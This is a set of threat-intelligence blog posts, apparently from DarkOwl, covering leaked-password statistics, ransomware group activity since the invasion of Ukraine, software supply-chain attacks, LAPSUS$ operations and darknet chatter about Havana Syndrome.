Even the most sophisticated password crackers will need significant processing power and time to successfully break long, complex passwords. Unless an 8-character password includes numbers and symbols, the password can be potentially brute forced.

Time to Crack Passwords
Figure 2: Time to Crack Passwords of Varying Degrees of Character Length and Complexity

Over 4 billion of the passwords (4,285,451,030) available in DarkOwl’s Entity API are 32 characters or less. 662,341,057 passwords could be classified as extreme and greater than 32 characters in length.

Figure 2 demonstrates that passwords including numbers and symbols are harder to crack than letters alone. DarkOwl’s data contains a significant volume of passwords with some degree of complexity but only 637 million plaintext passwords would be classified as “strong.”

Strong passwords defined as containing special characters, digits, lowercase, uppercase, and length greater than 8 characters.

Passwords That Age Us

Do you have a favorite year that you include in your password for uniqueness? Perhaps it’s your birthday year or anniversary. Both are very common. We found over 707 million passwords include a year string that starts with “19XX” or “20YY.”

Years

According to our data distribution, peak volumes of passwords include the data range of 1980 to 1994. The most frequent years we observed were:

1990: 14,006,141

1987: 13,795,566

Distribution of Passwords
Figure 3: Distribution of Passwords Containing a Date (Year) String

QWERTY is Simply Lazy

The “QWERTY” keyboard layout originated in the late 1860s and was designed to help people type and translate Morse code faster. Regardless of its origins, people heavily rely on the top row of the American keyboard characters in many password fields; 5,793,906 passwords in DarkOwl Entities API contains the6-character string “qwerty.”

Even worse is sequential numbers with 29,010,394 consisting of “123456” and 11,718,471 going to the trouble to add the whole number set, “123456789.”

DarkOwl has collected 5,857,363 passwords using the laziest password of all: the word, “password.”

Hashed Passwords > Plaintext

Billions of leaked plaintext passwords are tragic, no matter the complexity, character length, or whether a date string or qwerty is included. Therefore, if you suspect a plaintext password you use or have used in a commercial webservice has been compromised, change it immediately and cease using it on any authentication logins. Credential stuffing campaigns exploit password reuse and utilize email address and password combinations to attempt logins outside of the source of the original leak.

Given the propensity for commercial data breaches, most authentication and digital identification protection platforms strongly suggest users passwords are stored in a hashed format instead of plaintext to reduce the likelihood of immediate malicious use upon compromise.

6% (518,566,724) of the passwords available in DarkOwl’s Entity API are hashed passwords.

In cryptography, hashing involves using a mathematical algorithm to map data of any size into a bit string of a fixed size. In password hashing, a ‘hash’ consists of a unique digital fingerprint (of a fixed size) corresponding to the original plaintext password which cannot be reversed. There are several different types of ‘hashing algorithms’ available for encrypting passwords.

The most common hash in DarkOwl’s data is MD5 followed by SHA-1.

Some MD5 hashes in phpBB and WordPress appear as 34 characters instead of 32. DarkOwl has 345,431 hashed passwords consisting of 34 characters.

Both MD5 and SHA-1 have been deemed vulnerable as they are subject to collision attacks and dehashing. One of the most popular password hacking programs to date, Hashcat, contains lookup tables for popular wordlists, like RockYou allowing for the original plaintext password to be deciphered.

Password Strengthening Tips

Although you can’t prevent commercial services getting breached and usernames, email addresses, and password combinations getting leaked, you can follow some simple steps to ensure you employ robust password hygiene and reduce the risk of a password getting brute forced or exploited in a credential stuffing campaign.

  • Use an automated complex password Manager like Lastpass, BitWarden, or 1Password.
  • Don’t reuse passwords. Have unique password for every login and streaming service you sign up for.
  • Choose passwords at least 16 characters in length.
  • Include symbols and numbers for increased complexity.
  • Avoid using passwords with dictionary words or names.
  • Don’t use sequential numbers or the word “password”
  • Don’t use the year of your birth or anniversary in your password.
  • Turn on multi-factor authentication (MFA) for important accounts like financial and banking sites.

Celebrating World Password Day

Today’s World Password Day is a perfect time to pause and review the security – or lack thereof – of your most common password habits. After reading this blog, we invite to you to consider taking the following actions today:

  • Review passwords stored in your keychain, password managers, or sticky notes.
  • Change any passwords you might be reusing across multiple sites.
  • Share password tips on social media with friends and family.
  • (#WorldPasswordDay)
  • Transform a weak password into a strong one using the password strengthening tips above.
  • Turn on MFA for all important accounts.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.

Ransomware Resurgence and Emergence: Continued Analysis of RaaS Activity Since the Invasion of Ukraine

May 04, 2022

Ransomware on the Darknet Continues

Netblocks Status of Vodafone
Figure 1: Netblocks Status of Vodafone, 6 March 2022

The interruption in victim announcements was more like a slow-down and did not last long with a quick ramp up from the major RaaS industry players: CONTI, Lockbit 2, and CL0P announcing dozens of victims during the month of April.

LockBit2 – a gang that “claimed” neutrality in the Russian-Ukraine war – has the highest number of total victims since the 24th of February at 280. That’s an average of 4.5 victims per day by a single group.

DarkOwl is currently tracking 25 active ransomware groups. Across those groups, the total number of victims – just since 24 February – totals 813, presenting an even more worrisome average of 11.8 victims per day.

Figure 2: Scatter plot distribution of daily ransomware victims per RaaS gang

Critical Infrastructure Targeted

Unsurprisingly, victims include several US and NATO-based critical infrastructure organizations and suppliers including local government municipalities, electrical and alternative power providers, water, telecommunications, and transportation suppliers.

DarkOwl also observed an increase in manufacturing and construction-related companies with downstream victims including international lumber and steel processing companies mentioned quite frequently.

CONTI announced last week they successfully encrypted US-based MACK Defense, LLC a major parts supplier and sales organization attached to the MACK trucking company. This will likely cause further interruptions to an already encumbered and fatigued US ground-based supply chain.

Meanwhile, Snatch leaked over a gigabyte of data from a popular European travel website, TUI Group.

Figure 3: CONTI Announcement of Ransoming MACK Defense, LLC

Ransomware groups have announced at least half a dozen victims across electrical, water, or natural gas-affiliated suppliers the US, Canada, and Europe in the last 10 days.

In March, German wind-turbine supplier Nordex suffered a severe cyber incident carried out by CONTI shutting down over 5,000 wind turbines across the country. On April 23rd, CONTI leaked 145GB of exfiltrated data related to the company, archived across 82 compressed data files. The Nordex cybersecurity incident was likely a critical infrastructure retaliation attack for Germany’s support of Ukraine.

HiveLeak and AlphaV’s activity also increased significantly with nearly 100 victims between the two RaaS gangs alone. Vice Society also leaked 20 victims in the last 10 days of April after previously having a relatively slow ransomware

Statement from Snatch Ransomware
Figure 4: Statement from Snatch Ransomware

The Resurrection of REvil

REvil’s “Happy Blog” suddenly appeared online and operational on April 20th on the Tor network, redirecting to a new URL which announced 5 victims. The last victim posted by the REvil group was in mid-October 2021 shortly before experiencing 404 errors and rumors emerged suggesting the FBI had seized the admin panel had deleted the Tor service using UNKN or another admin’s keys.

According to the BBC, members of the REvil RaaS operation were reportedly taken into custody by the Russian FSB after an international law enforcement operation last December.

The redirected URL includes a link to “Join Us” with a request for affiliates to contact them using a Tox address provided. The advertisement continues their historical 80/20 ransom split and states they have a “Тот же проверенный (но улучшенный) софт” [TRANSLATED] “The same proven (but improved) software.”

Figure 5: REvil’s Latest Call for Affiliate Partners

The new REvil Tor service boasts an odd-mix of victims, including an oil and gas company in India, asphalt production company and a corporate signage company. By the end of the month, the service was offline and inaccessible. The intentions of revitalizing the REvil Tor service is unclear, but the timing was near coincident with the US closing diplomatic channels with Russia on cybersecurity.

The resurrection of REvil could indicate that President Putin has released arrested ransomware operators to carry out retaliatory attacks against critical targets in the US and Europe.

New Ransomware Groups and Patterns Emerge

A new RaaS group called Blackbasta appeared online and announced 11 new victims on the 26th of April. Blackbasta uses the ChaCha20 and RSA-4096 cipher, an upgrade from groups like Maze and Sekhmet that utilized ChaCha20 and RSA-2048 ciphers. They also call their Tor victim’s page, “Basta News” playing off the CONTI marketing strategy.

Figure 6: Blackbasta Tor Service “Basta News” 30 April, 2022

Another new group, Onyx ransomware started leaking their victim data on a Tor service titled, “Onyx News” with 7 new victims added at the end of April. The victims appear to be primarily small businesses and organizations, including a local US police office and a couple of family medical practices.

The x001xs ransomware group appears to have pivoted to a different underground industry with no victims announced since late January. Their Tor service also now redirects to a darknet credit card provider called “BitCarder.”

RaaS group activity across the whole industry has steadily increased over the last 10 days. When visualizing the various groups’ victim announcements as a function of post-date, they demonstrate quite noticeable “peaks and valleys” that suggest less publishing collectively occurs on weekends.

The outlier for this trend is CL0P who drops several groupings of victim announcements only around the weekends. The CL0P group was much less active in March with announcements only at the beginning and end of the month.

Figure 7: Daily Distribution of Total Victims Per Day Across All Groups, with 3pt Moving Average Filter

Ransoming Russia

Since the end of March, an Anonymous-linked, pro-Ukrainian cyber threat cell known as Network Battalion ’65 (or simply nb65) has carried out cyberattacks against Russian entities using ransomware. The group allege they are deploying a variation of the leaked CONTI ransomware source code, which surfaced shortly after the invasion. We have identified and downloaded at least half a dozen data leaks provided by the nb65 group that accompanied the group’s announcement of the CONTI code use.

Figure 8: nb65 Announces Use of CONTI ransomware Against JSC Bank of Russia

Hackers Hacking Hackers

On 20 March, Arvin Club published a data leak associated with the pro-Russian aligned STORMOUS ransomware gang. Arvin claimed the group poorly configured their ‘new’ Tor service after mirroring their Telegram content to the anonymous network. It was unclear whether this was motivated by malice or geopolitical alliances.

In early March, STORMOUS posted an official statement to their Telegram channel stating they did not intend to attack Ukraine but could not sit back and watch attacks against the country [Russia] that “means so much to us.” They also included CONTI’s logo and the handshake emoji with their respective hashtags, symbolizing some level of partnership.

Figure 9: Arvin Club Leak of STORMOUS Info on Tor | STORMOUS World Announcement

In the last month, Russian ransomware groups and threat actors are actively targeting pro-Ukrainian cybersecurity researchers and Anonymous-linked cyber cells. Many researchers have been doxed and threatened across social media and Telegram in vendetta-like attacks.

Figure 10: Twitter Post Warning Anons that Russian Ransomware Gangs are Targeting the Anonymous Collective

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.

Version Control Systems and Software Supply Chain Risk

A review of the ongoing darknet risks associated with the compromise of Version Control Systems (VCS) and other software supply chain version control systems. Our full report can be found here.

Research from DarkOwl analysts continues to indicate that software programming and engineering tools are a viable exploitation vector

Last week, a maintainer for NPM package – a widely used package manager for the JavaScript programming language – showcased how potentially powerful supply chain attacks on software development and components can be. This individual, an open-source software developer known as RIAEvangelist, intentionally embedded malware in the latest stable release of a popular repository called node-ipc out of protest for Putin’s atrocities against Ukraine. The malware is officially labeled ‘peacenotwar’ and deploys with a readme file titled WITH-LOVE-FROM-AMERICA.txt, and notably only is triggered to install on devices with a Belarus or Russia geo-located IP addresses.

Developers and security researchers around the world have been equally appalled and conflicted by the intentional sabotage of an open-source software package. Many are particularly concerned about the reputational damage these incidences cause to the open-source software development movement.

Despite general widespread sentiments against Putin’s invasion of Ukraine, the open source software development community has marked RIAEvanglist’s NPM package as malicious, because this individual chose to deploy malware in the digital supply chain ecosystem.

“This code serves as a non-destructive example of why controlling your node modules is important. It also serves as a non-violent protest against Russia's aggression that threatens the world right now. This module will add a message of peace on your users’ desktops, and it will only do it if it does not already exist just to be polite.” 

     - peacenotwar source code description

Exploitation of software-build processes and code repositories facilitates wider, more-catastrophic distribution of malware and enterprise-level software compromise. By poisoning software development, update processes, and link dependencies, threat actor’s malicious codes can be potentially distributed to thousands of users without need for social engineering, e-mail compromise, or drive-by-download malware delivery mechanisms.

In recent months, DarkOwl has observed a significant increase in instances of malware developers mentioning or discussing direct attacks to international software supply chain. In many cases, this chatter was centered around plans that involved targeting popular open-source software developer repositories like Github and Bitbucket, as well as associated software digital support infrastructure.

Exploiting Version Control Systems (VCS) and poisoning supply chains is not a new threat vector. In 2021, the Kaseya ransomware attack – via a simple malicious software update pushed to thousands of users by notorious ransomware gang, REvil – highlighted the extensive threat to software supply chains and cloud-based commercial software repositories. (Source)

The December 2020, the Solarwinds attack similarly inspired international concern for the integrity of commercial enterprise software and underscored the need for widespread implementation of zero trust architectures. (Source)

Another example of a threat actor group exploiting digital supply chain vulnerabilities is the hacking group LAPSUS$. The increasingly active group most recently announced that they had acquired privileged access to digital authenticator Okta’s networks via a support engineer’s thin client. The result of Okta’s compromise exposed significant intelligence findings, and highlights the overarching risks at stake to any software development and operational lifecycle. (Source)

Brief summary of how LAPSUS$ leveraged supply chain exploits to compromise global software company Okta:

  • LAPSUS$ most likely gained access to Okta using credentials purchased on the deep web marketplace: Genesis Market, proving the underground continues to feed criminal empires.
  • AWS credentials and code repository tokens were likely stored in company Slack messaging systems that LAPSUS$ then utilized to move laterally through peripherally associated digital infrastructure.
  • LAPSUS$ clearly stated they were not interested in Okta, but the customers Okta supported and had access to.
  • Okta’s implementation of zero trust architectures called into question given level of access available to third-party support engineer account.
  • Okta estimates at least 366 unique clients’ organizational data could have been accessed by the threat group via the initial compromised privileged access.

We are witnessing – in real time – the terrifying realization of the dangers to software supply chains via malicious compromise of the tools and infrastructure critical to supporting the software development lifecycle. Any product or service that touches one’s network, i.e. customer relationship management (CRM) software, software version control (VCS) utilities, authenticators, payroll and timekeeping accounting systems, cloud service providers, internal employee messaging platforms (Slack, Teams, etc.) are all potential targets for compromise.

Research from our analysts

Version control systems and software supply chains are a viable and high consequential attack vector readily exploited by cybercriminal organizations, nation state actors, and hacktivists from the darknet. DarkOwl believes there will be continued and increased attacks against dependency libraries and software package managers, such as NPM and PyPI, with the intention of stealing information and establishing long term persistence in the victim machines. Read full report here.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.

Review of Ransomware Gang Activity Since Ukraine Invasion

In light of disturbances in the darknet due to nationalistic fractures amongst ransomware and cybercriminal groups, DarkOwl analysts did a cursory review of activity across ransomware-as-a-service (RaaS) gangs since the invasion of Ukraine.

We reviewed the number of reported victims by RaaS groups and the location of the victims, and determined the following:

  • Conti and Lockbit 2.0 lead in total number of victims announced since the 24th of February, 2022.
  • Conti was offline for almost a week due to infrastructure leaks and fractures with their Ukrainian-aligned affiliates. Since March 1st, the group has resumed locking and leaking victims’ networks around the world.
  • Several key Tor services for well-known RaaS gangs, including Pay2Key, Blackbyte, Cuba, are online and active; however, they have not shared any victim’s data since the invasion on February 24th, 2022.
  • A new RaaS group called Pandora Gang hit multiple victims in a matter of days, including two victims from Japan.
  • STORMOUS ransomware has been heavily targeting Ukraine.
  • STORMOUS most recently attacked 4A Games (Ukraine) and EPIC Games (US).
  • Given the severity of the attacks against Nvidia and SAMSUNG, LAPSUS$ is now being categorized as a RaaS gang, even though they do not have an affiliate program that we are aware of.
  • US, Canada, UK, Czech Republic, and Germany have the highest volume of ransomware victims in the distribution of victims by location published in the last two weeks.
  • Many ransomware victims have direct connection to US and Western critical corporate/government operations and supply chains.

NOTE: The charts below do not take into consideration attacks by Russia against Ukraine networks in conjunction with HERMETIC WIPER attacks or leaks released by Free Civilian. The totals, as reported by the Ukraine government, would exceed that of those counted here for the US.

LAPSUS$ Group: Additional Findings

The cybercriminal group LAPSUS$ has ramped up their activities since the invasion – emboldened by their attacks against Nvidia and SAMSUNG.

They recently solicited experts in various specific industries for their next victim selection, possibly looking for insiders to assist. Telecommunications, software development/gaming, hosting, and call-centers were among the industries requested.

Over the weekend, LAPSUS$ also implied they were responsible for recent “cybersecurity incident” with Ubisoft.

DarkOwl will continue to monitor RaaS activity and update as new information becomes available.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.

Darknet Threat Actor Report: LAPSUS$

In order to curate interesting darknet data collection from sources across the deep web, Tor, I2P and other “darknets” our analysts regularly follow “darknet threat actors” that openly discuss and disseminate stolen critical corporate and personal data.

In December 2021, DarkOwl witnessed increased activity on the darknet regarding the cybercriminal gang known as LAPSUS$. The group appears to have preference for attacking Portuguese-speaking organizations using data extortion-style campaigns and leverage compromised AWS servers where possible. Thus far, LAPSUS$’s attacks seem to have little critical impact to the victim’s organizational operations, with seasoned darknet community members stating the group is “amateur.”

DarkOwl believes the cybercriminal group has potential to become a formidable darknet threat actor with the increasing frequency of attacks in recent weeks. The lethality and economic impact of the attacks against their victims have yet to be determined.

Vodafone Telecommunications in Portugal

Since last December, the darknet threat actor group known as LAPSUS$ has been actively targeting Portuguese speaking services across Latin America and Portugal including prominent media and telecommunications companies on both continents.

Most recently, between 7 and 8 February, Vodafone Portugal – a subsidiary of Vodafone Group in the UK – stated in a press release the company was subject to a “deliberate and malicious cyberattack with the aim of causing damage and disruption.” Open-source reports indicate the attack impacted Vodafone’s 4G/5G voice and SMS service as well as its television services, but no ransom was demanded. While there is limited information about the attack in the press, Vodafone persists no subscriber or sensitive customer data was accessed or stolen.

On the LAPSUS$ Telegram channel, the group posted Vodafone with the eyes emoji without directly claiming credit for the attack. When someone directly asked if they were responsible for the Vodafone outage affecting millions of mobile phone subscribers, they stated:

“we don’t confirm or deny this yet.”

LAPSUS$’s Flurry of Activity Since December 2021

DarkOwl analysts began closely following LAPSUS$ across the darknet, deep web, and adjunct communication platforms since they claimed responsibility for a major cyberattack against the Brazilian Ministry of Health in mid-December. The cyberattack, allegedly “ransomware in nature” compromised Brazil’s Ministry of Health COVID vaccination records database, deleting the entire database contents, and defacing its website with the following message:

[TRANSLATED]

“The internal data of the systems were copied and deleted. 50 Tb of data is in our hands. Contact us if you want the data back”

The Brazilian government acknowledged their web services were offline and inaccessible to users for a short period of time without directly admitting it was LAPSUS$ who carried out the attack. The attack was like other ransomware/extortion-based attacks in the reported deletion of data; however, there was never a monetary ransom demand stated nor evidence of the group possessing the data or sharing compromised records on the darknet – despite cheers from their online supporters to release information on President Bolsarno’s vaccination status.

The group posted a statement on Telegram indicating that they had gained access to the Ministry of Health’s Amazon Web Services (AWS) and claimed they did not want to post evidence of their access because they still had access to the system despite the Ministry of Health restoring their services.

On Christmas Eve, the LAPSUS$ group attacked Claro and Embratel Telecommunications companies in Brazil reportedly stole over 10 PB (10,000 TB) of sensitive corporate information and SIM details for Claro customers across mass data storage systems such as: AWS, 2x Gitlab, SVN, x5 vCenter (MCK, CPQCLOUD, EOS, ODIN), Dell EMC storage, and Telecom/SS7.

The group shared screenshots detailing their level of access to the Claro network infrastructure and data on the dark web. We are still investigating how the group originally gained access to Embratel and Claro’s infrastructure. The group emphasized the extent of their access in the companies, highlighting they had access to over 1,500 virtual machines in use by Embratel and 23 unique hosts (IP addresses). From the screenshots, DarkOwl confirmed they used Windows Remote Desktop application to connect to many of the compromised computers within the Claro Network on their web browser. The screenshots included network management utilities for the network and their SIM network.

They also shared screenshots from a Powerpoint presentation they found on Claro’s network that detailed how law enforcement intercepts phone calls, SMS messages, and Claro customer network activity. 

(Note: the images below have been blurred intentionally so as not to reveal PII)

It is unclear from the screenshots shared whether members of the LAPSUS$ group used their local machines or a virtual environment to carry out the attacks. Nevertheless, the desktop of the browser screenshot suggests the OS was Windows and the temperature was 4 degrees Celsius at 21:56 on December 25, 2021.

Applying some simple OSINT analysis using historical weather databases, we discovered São Paulo, Brazil did not have weather conditions at that date/timestamp, but London, United Kingdom experienced similar weather patterns. This either means that the LAPSUS$ Group includes members from around the world or their computing environments are set to the UK/GMT time zone.

Regardless of their physical location, the LAPSUS$ group has preference for attacking Portuguese-speaking organizations on both the South American and European continents. Representatives of the group speak English on their Telegram channel.

In early January, the group conducted similar defacements to the Ministry of Health in Brazil for Impresa, a major media outlet, parent to SIC and Expresso in Portugal.  The group’s access to Expresso’s direct digital resources was extensive. During the attack LAPSUS$ members sent phishing SMS texts to Expresso’s subscribers, posted tweets from the news media’s verified Twitter account, and defaced its Twitter account, pasting to the top of the page the phrase:

 “Lapsus$ is officially the new president of Portugal.” (Source)

Information security researchers have noted that the text on the defacement is ‘Brazilian’ Portuguese – instead of Portuguese from the European continent – increasingly the likelihood the threat actors are based out of Brazil. LAPSUS$ claimed in their defacement they had access to their cloud services at AWS.

[TRANSLATED]

The data will be leaked if the necessary amount is not paid. We have access to the ‘cloud’ panels (AWS). Among other types of devices, the contact for the ransom is below.

Note from our analysts: When we think of “exposed credentials” we generally think of e-mail or server authentication data, e.g. username, e-mail address and/or password. The darknet is also haven for other types of critical corporate data credentials, including developer AWS cloud account identifiers, such as: Keys and Secrets for S3 buckets and web services.

Image: Example AWS_SECRET credentials shared on the deep web (Source: DarkOwl Vision)

Barely a week after the attacks, LAPSUS$ announced on their Telegram channel their next victim had been Localiza Rent a Car SA. The attack appeared to be a DNS spoofing attack on their website, redirecting Localiza website visitors to a porn site instead.

According to open-source reporting, the company reported a “partial interruption” and there was no evidence any customer data or sensitive information was stolen. No ransom demand was made either. 

Less than two weeks later, LAPSUS$ shared a Twitter post from Portugal-based Francisco Martins speaking of how the Grupo Cofina attack was against the company and not an attack on press freedom and another post referencing a popular Cofina journalist. LAPSUS$ never officially claimed responsibility for attacking the Portuguese media outlet that impacted multiple digital content platforms including: Correio da Manhã (Morning Mail), Sábado (Saturday) magazine, Jornal de Negócios (Business Journal), Diário desportivo Record and CMTV. (Source)

Technical specifics of the attack against Cofina are still murky, with little to no information coming directly from LAPSUS$. Security researchers note similarities in the “no ransom demand” style of ransomware, e.g. file corruption and extortion carried out by LAPSUS$, and the fact the group hit other major Portugal-based media companies merely weeks before.

Portugal’s Judicial Police (PJ) are actively investigating the incident and it is not proven LAPSUS$ carried out the attack. The group could be posting to their Telegram to infer their connection without proof and gain criminal credibility.  

Image: Twitter Post Circulated on LAPSUS$ Telegram channel the day of Cofina attack. (Source)

[TRANSLATED]

“The Lapsus group just wanted to shut up Tânia Laranjo #Respect”

Additional Historical Evidence Surfaces

Using DarkOwl Vision, DarkOwl detected previous activity from the LAPSUS$ on the deep web and darknet including posts in July 2021 on RaidForums and other darknet forums claiming they had compromised networks and stolen data for the FIFA soccer games from EA. On those posts, they shared their PGP Key, signed the posts “LAPSUS$”, and logged into the forums using the pseudonym, 4c3.

Image: (Raid Forums, URL available upon request)

Posts from the group on another darknet forum last summer were shared in the English language detailing to EA that they found a Remote Code Execution (RCE) vulnerability in the “frostbite engine” and they had no intention to target console users. This is a typical approach to trying to extort a company for specific vulnerability, e.g. “malicious bug bounty.”

In August 2021, the LAPSUS$ group ended up leaking the EA/FIFA data they had stolen after their attempt at extorting the company for $28 Million USD had failed to materialize. (Source: Raid Forums)

Users on RaidForums indicated the 4c3 moniker for LAPSUS$ on the forum was also tied to a CryptBB staff member known as Cyberjagu who was also trying to sell the EA source code. 4c3 denied any connection. According to open-source reporting, analysts with Blackberry’s Research and Intelligence Division confirmed Cyberjagu is some sort of “intermediary” for the cybercriminal group behind the EA/FIFA attack.

Drama Between Doxbin & LAPSUS$

In early January, the “dox” of a potential LAPSUS$ member surfaced on the controversial deep web paste site known as “Doxbin” and has received over 7,000 views as of time of writing. The dox – intentionally not included here – suggested the LAPSUS$ member was actually a 16-year-old teenager residing in Kidlington, UK and regularly used the pseudonym(s) SigmA, wh1te, and Breachbase in the underground. The dox may have been leaked in retaliation after LAPSUS$ shared hacked internal docs from Doxbin on their Telegram channel on the 5th of January.

According to the LAPSUS$ Telegram channel and the LAPSUS$ Twitter, SigmA (@sigmaphoned/Alexander) might be a “high-ranking” member of the LAPSUS$ group. Since late January, many of the users on Telegram have been trying to reach SigmA, but he’s not responding to messages. The January dox suggested might be in the process of relocating to Spain with his family. (Source: DarkOwl Vision)

Image: Users in LAPSUS$ Telegram Channel inquire about SigmA’s whereabouts

A Preference for Monero Leads to a Telecommunications Phishing Campaign

Last summer, LAPSUS$ also posted a Monero address on a deep web forum discovered by DarkOwl Vision. The same address was also included in numerous scam/phishing reports from users with British mobile telecom providers, EE and Orange. In July, users from EE reported receiving an ominous message from LAPSUS$ demanding EE pay them “4 millions USD” after making normal iTunes purchases. Perplexing to users, the texts arrived from historical “iTunes messaging” phone numbers.

Image: (Source)

Curious about something you’ve read? Interested to learn more? Contact us to learn how darknet data applies to your use case

Darknet Indicators of Anomalous Health Incidents (AHIs)  

The U.S. Department of State and three-letter agencies across the U.S. Intelligence Community – which staffs a mixture of darknet intelligence and open-source intelligence (OSINT) researchers across a variety of security sectors – have had increasing concern by reports of what the U.S. Government identifies officially as “anomalous health incidents” (AHIs). The news media has generally labeled these incidents as reports of “Havana Syndrome,” due to the fact that the location of the first reports originated from diplomats located at the U.S. embassy in Cuba in 2016, but continues today around the globe.

An interim intelligence report on the subject was recently released by the CIA after President Biden’s call for answers as to the cause of the incidents and Congress passed the HAVANA Act last fall to help compensate victims. The report, briefed by government officials to POLITICO in mid-January, has received criticism for its “preliminary” intelligence assessment, which concluded no U.S. foreign adversary nor specific directed energy weapon is likely behind the nearly 1,000 allegedly directed attacks against government personnel stationed in embassies around the world.

Given the lack of inter-agency coordination on the interim report, it’s unclear whether these findings signal a finale to USG’s overarching investigation. According to open source reporting, there are still several cases the CIA could not explain and CIA Director William Burns issued a statement suggesting the agency will continue to look into the matter.

“We have reason to believe the interim report does not even represent the consensus of the full CIA, instead reflecting the views of a subset of officials most interested in resolution and closure.” - Statement from CIA Director William Burns

Recognizing the uncertainty of the findings and widespread outrage from AHI victims, DarkOwl sought out to gather and assess data across the darknet and deep web to provide supplemental indication of the public sentiment regarding AHIs, as well as additional insights into the potential technological sources that may be targeting diplomats and intelligence officials.

Chatter Spreading Potential Nation-State Sponsored Propaganda

During our research, we discovered indications of deep web users sharing Russia-sponsored anti-US propaganda related to mind-control and directed energy induced schizophrenia. For example, one user shared a link to content of this nature via a WordPress “blog” that directly references and links to an “independent research news website” called “Global Research” (globalresearch.ca). In 2020, the State Department identified the allegedly Canadian news outlet as a Russian controlled propaganda front.

  • According to DNS records, the WordPress blog domain cited (youarenotmybigbrother.blog) on the deep web is hosted on a server located at the IP address: 192.0.78.24/25, located in San Francisco, California.

  • DarkOwl reviewed the “Canadian” Global Research website for mentions of “Havana Syndrome” and surprisingly found no recent mentions of “Havana syndrome” or AHIs or any official neurological research, but instead found multiple re-shares of articles citing a study from the University of Edinburgh directly contradicting the State Department’s 2018 commissioned report from the University of Pennsylvania, peer reviewed and published by the Journal of the American Medical Association (JAMA).

  • The general lack of reporting related to Havana Syndrome on the Global Research website, including disinformation suggesting the incidents are caused directly by the USG or non-foreign directed energy sources, is significant and warrants further analytical review of other known Russian-sponsored propaganda websites.

  • Since the release of the interim CIA report last week, darknet and deep web users are aggressively re-sharing articles and podcasts “debunking” the idea of Havana Syndrome entirely as a mass psychogenic illness resulting from an internal U.S. government propaganda disinformation narrative to demonize Russia and destabilize to US-Cuba geopolitical relations.

Some deep web users hypothesize the remote possibility that US adversarial governments – such as Russia and China – use lower earth orbit satellites and even cellphone towers to direct nefarious RF signals attack targeted individuals.

  • In summer 2021, an anonymous user of the deep web imageboard known as 4chan, theorized that AHIs are caused by Russian space assets or US-based cell phone antennas that have been potentially converted into a microwave microphone to detect speech and inadvertently over-amplifies the signal causing brain damage. Other users of the same forum also imply that these attack vectors could be deployed by the US against their own personnel as part of some sort of covert operation.

  • On the subreddit /r/TargetedEnergyWeapons, Reddit users shared video from a 1985 CNN news report of a U.S. based RF directed energy weapon called the “Brain Bomb” that the U.S. government reportedly never pursued to discredit the USG.

4chan discussion about “Havana Syndrome” being caused by Russian-space listening devices (original thread removed by website since discovery)

Technical Materials Related to AHIs on the Darknet

Our analysts identified numerous mentions of the US government’s historical activities related to psychotronic and psychological warfare. Several deep web users circulated “blogs” – dating back to 2010 – that include a comprehensive archive of information related to potential neurological and psychological weapons developed by DARPA and the US Military as well as similar tools at the disposal of Russian intelligence arms.

The aforementioned blog highlights reports from the early 2000s that Putin supposedly outlawed the use of weapons of psychotronic influence with the intent to cause harm, despite the fact psychotronic weapons were specifically mentioned in open-source reporting of Russia’s advanced weapons state procurement plans outlined for 2011-2020.

“The development of weaponry based on new physics principles; direct-energy weapons, geophysical weapons, wave-energy weapons, genetic weapons, psychotronic weapons, etc., is part of the state arms procurement program for 2011-2020”

— Russian Defense Minister Anatoly Serdyukov after meeting with Putin in March 2012

DarkOwl analysts also observed numerous darknet and deep web users discussing and resharing a 1976 declassified intelligence report from the Defense Intelligence Agency titled, “Biological Effects of Electromagnetic Radiation (Radiowaves and Microwaves) Eurasian Communist Countries (U).”

Segment from declassified 1976 DIA report shared on the darknet

Another report shared across darknet and deep web users originated from the U.S. Army and dates back to December 13th, 2006 . The report was released through an official Freedom of Information Act request by a Mr. Donald Friedman of California, USA.

The document contains an unclassified addendum to another intelligence assessment, which was developed by the National Ground Intelligence Center (NGIC) and likely originated in the late nineties, based on the document number. The US Intelligence Community downgraded the report from SECRET//NOFORN and details the “Bioeffects of Select Nonlethal Weapons”.

Darknet users referencing this report generally used it as supporting evidence that the US military has extensive research on the effects of microwave radiation for battlefield and crowd control use. Like the March 1976 report, the NGIC intelligence reporting regarding the effects of directed pulsed radio-frequency correlate with the symptoms experienced by diplomats and intelligence personnel reporting AHIs.

The report also identifies that the associated technology is readily commercially available, but would need to be customized for intensity variability and targeted use.

US Army response to 2006 FOIA request dated, 13 December 2006.

Segment from the NGIC report detailing the technology’s biological influence on the subject.

The NGIC report further identifies auditory phenomenon experienced by subjects, e.g. “clicking, hissing, ticking, and buzzing” consistent with the 2018 JAMA report consolidating the findings from the University of Pennsylvania clinical study of AHI victims. These symptoms are near identical to symptoms connected with the “Frey Effect,” discussed extensively across chat platform users and Reddit discussion forum participants as well as research conducted by the Robert Lansing Institute.

“Ability to hear the “sounds” depends on high frequency hearing and low ambient noise. Pulsed RF/MW in the 2.4-10,000MHz range produces perceived noises that resemble sounds “such as a click, buzz, hiss, knock, or chirp”–just as diplomats report. ”

— Quote Correlating Diplomats’ Symptoms to the Frey Effect (Source: Robert Lansing Institute)

Segment from the NGIC report detailing the technology’s biological influence on the subject.

One darknet Tor service we identified has over 1,400 technical documents detailing numerous radio frequency (RF) and directed energy (DE) based technologies utilized for such subjects as: mind control, remote viewing, psychoacoustic effect, and electronic surveillance.

Much of the content includes academic research and intelligence agency and military documentation as well as biographies of key academic and intelligence researchers in paranormal studies and mind control related topics. The originating domain has not been online since November 2018, but all available content from the domain is archived in the DarkOwl Vision database of historical darknet records.

Source DarkOwl Vision (DocID: 68eafa7fafe9be29be48f419d8c1fb89b4fa5707)

On another user on Tor posted a report as recently as late August 2021, describing US Navy sound-based non-lethal weapon program. According to the post, this program utilizes a recording of the target’s own voice, captured with a long-range microphone, that the system distorts by applying phase shifting and auditory track overlay and feedback.

The weapon, called the Acoustic Hailing and Disruption (AHAD) system, then transmits the high intensity auditory signal directly back to the target using a parametric speaker, disorienting them to the point of they are confused and cannot speak.

Darknet post detailing US and Russian non-lethal weapon technologies. (Source: DarkOwl Vision – DocID d75544cb73549b3db675562290debec678700692)

